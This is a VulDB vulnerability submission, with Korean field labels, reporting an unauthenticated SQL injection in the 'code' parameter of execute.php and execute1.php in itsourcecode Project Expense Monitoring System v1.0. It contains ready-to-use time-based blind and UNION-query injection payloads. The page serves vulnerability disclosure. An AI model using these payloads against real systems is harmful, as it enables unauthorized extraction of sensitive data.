| 제목 | itsourcecode Project Expense Monitoring System v1.0 SQLi |
|---|
| 설명 | Attackers do not need to log in to the backend. They can pass in the code parameter in the execute.php and execute1.php pages and construct special SQL statements to carry out SQLi injection attacks to obtain sensitive data.
POC:
Parameter: code (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: code=1' AND (SELECT 3055 FROM (SELECT(SLEEP(5)))qdgV) AND 'wCrt'='wCrt
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: code=1' UNION ALL SELECT NULL,CONCAT(0x717a717071,0x6a5158484166616e41746e696241666561674a53525661626877575a6f426454534d69745359456c,0x71786a7171),NULL,NULL,NULL,NULL,NULL,NULL-- - |
|---|
| 원천 | ⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE3-2.md |
|---|
| 사용자 | GUOTINGTING (UID 73614) |
|---|
| 제출 | 2024. 08. 17. PM 02:14 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 08. 19. PM 04:12 (2 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 275119 [itsourcecode Project Expense Monitoring System 1.0 execute.php SQL 주입] |
|---|
| 포인트들 | 20 |
|---|